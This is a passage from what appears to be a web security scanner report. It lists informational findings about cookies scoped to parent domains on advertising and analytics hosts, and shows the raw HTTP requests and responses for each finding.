Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:20 GMT
Content-Type: image/gif
Connection: close
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
13.52. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26670

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
13.53. http://as.chango.com/links/adunit/1.31759988192e+12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...
13.54. http://as00.estara.com/fs/ruleaction.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/ruleaction.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fs/ruleaction.php?accountid=200106297609&urid=79044&cookieurid=&estara_fsguid=5860EEFA281121EC93852AEC182A3278&dnc=1317600784907704486 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsserver__SESSION__=t-501.estara.com; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:14 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__; expires=Sat, 01-Oct-2016 00:13:14 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}
13.55. http://as00.estara.com/fs/rules.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC20111003000909914181269334%26plf%3Dpcln%26INIT_SESSION%3Dtrue%26RefID%3DPLIGOUGO%26RefClickID%3DHOTELSEARCH&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_fsguid=5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=1317600769877566774 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XY5LDoMwDERvw67InzjEC85SQYtEF9CqpPevCIlJ69WM33hkAkDwpCokPTKKkIbgmmGM0xapotf3sN7Xz9J716KCei3DTc4FAcktDMh-LYlaS2iRxAnYdNwgk1zmR9z6rJ.vad21dGj7Xee9YEAu4DA-ZBnibZ4SDMpqyWRKMpkqCSxnMpmSBPY18UacR2d-HOa84fqG6zZXE2eEBQIVcpiTaE20kC8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Set-Cookie: fscookies=b64_XZNNUsMwDIVvkx0d-drWomdhCnSmLFoYCPfHcWxZaTbx8yc9R5JDAAiJzJT0jIyqZKXIcnlbr78rBfr6c3l8PP7u5yQnNLBk4.GlxxUF7S4MyE8ujbpLOSGpKPiTeUEmfbl9rr-nvv76vj62tWb0-W3d9xUL8gC7OJD7ZX2-XRssxuaRTYzIJkIksM7IJkYkcIokOZGE4t.xi5nDMYejm0QiTlih0CC7mMQiMSdjUDmBbQOobyhsT2PcqA9A5SSI5FO0jEvJSL0Q6qIdQEsmHIUMMYlEIpFoJBoJRUKTGKg4aWKQ2qKZ04ST2opJNtFJAUnutotB6pWelTYxCUaCTkiszIK6CgzmPaob9U8q6sG7GsFVJY3BNZsOzhSdc3l2zgfnfHDW6FxbKLGf4h1AxDRH2pXbpMMR6XBEOhSWYmGCGUIdTc08Bgl5m4pMD0zDjagfPSrCfw__; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:13:59 GMT
Content-Length: 26084
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...
13.56. http://asset.userfly.com/users/20826/userfly.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asset.userfly.com
Path:   /users/20826/userfly.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/20826/userfly.js HTTP/1.1
Host: asset.userfly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 3
Cache-Control: max-age=3600, private, max-stale=3600
Set-Cookie: capture_guid=9c784e4c-ed53-11e0-ab0a-12313b03145d; domain=userfly.com; path=/
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

13.57. http://ats.tumri.net/ats/ats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/ats

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Sat, 21-Oct-2079 03:23:16 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon Oct 03 00:09:09 UTC 2011
Content-Type: image/jpeg
Date: Mon, 03 Oct 2011 00:09:08 GMT
Content-Length: 807

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
13.58. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&c3=345&c4=59764&c5=7061&c15=1931%252C357%252C3196%252C996%252C2712%252C553%252C3115&c16=EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1&ns__t=1317599359145&ns_c=UTF-8&c8=Premier%20League%20football%20news%20from%20the%20Barclays%20Premier%20League%20%7C%20Manchester%20United%202-0%20Norwich%20City&c7=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2469333%2C00.html&c9=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:50:07 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

13.59. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:52:46 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633]]>>; expires=Tue, 01-Oct-2013 23:52:46 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
13.60. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035250&d.c=gif&d.o=guardiangu-network&d.x=43465411&d.t=page&d.u=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:51:22 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:51:22 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
13.61. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p119936314&c3=71054945&c4=43921374&c5=1&c6=1&c7=Sun%20Oct%20%202%2023%3A59%3A13%202011&c8=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome&c9=Official%20Site%20of%20the%20Premier%20League%20-%20Barclays%20Premier%20League%20News%2C%20Fixtures%20and%20Results%20%7C%20Home&c10=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2466648%2C00.html&c15=&1317599979190 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 03 Oct 2011 00:01:13 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Wed, 02-Oct-2013 00:01:13 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

13.62. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=531292&ev=OO-00000000000000000&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DOO-00000000000000000 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr

Response

HTTP/1.1 302 Moved Temporarily
Server: GlassFish v3
CW-Server: cw-app605
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr99f871d6edb7aea19dd0bf8; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:50:17 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|530739.99f871d6ab8391d98e386b3c.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|531292.OO-00000000000000000.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 01-Oct-2012 23:50:17 GMT; Path=/
Location: http://m.xp1.ru4.com/meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000
Content-Type: text/html;charset=ISO-8859-1
